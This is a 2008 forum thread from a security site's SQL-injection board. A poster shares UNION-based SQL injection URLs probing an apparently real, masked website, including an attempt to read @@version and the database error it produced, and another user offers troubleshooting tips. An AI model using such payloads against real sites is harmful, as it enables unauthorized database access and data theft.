|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| |
|
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145
People Online:
Visitors: 464
Members: 0
Total: 464
|
|
|
|
|
|
PacketStorm News |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
SQL injection help plz? |
|
Posted: Sat Jul 19, 2008 5:51 pm |
|
|
kr0k0 |
Advanced user |
|
|
Joined: Jan 26, 2008 |
Posts: 128 |
|
|
|
|
|
|
|
Hi , i need a litle help plz for this injection SQL i can't view @@version or version() i have try with using a POST method and also GET but nothing ; look at the request ;
Code: | /page.php?id=-6+union+select+1,2,3,4,5,6,7,8,9,10,11/* |
and number '2' in the title
so i have try to view @@version or any column . . . like this
Code: | /page.php?id=-6+union+select+1,2,@@version,4,5,6,7,8,9,10,11/* |
and i have see a error msg SQL
Code: | Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in D:\xxxxx\xxx.com\inc\viewPage.php on line 25 |
so what i can to do plz waraxe help me? |
|
|
|
|
|
|
|
|
Posted: Sat Jul 19, 2008 6:58 pm |
|
|
mge |
Valuable expert |
|
|
Joined: Jul 16, 2008 |
Posts: 142 |
|
|
|
|
|
|
|
are you sure version() doesn't work?
judging from the error message i'd say your the query has an error in it. i've never seen "@@version" and that probably is the the reason of the error.
you might want to test if ( ) are stripped from the query |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|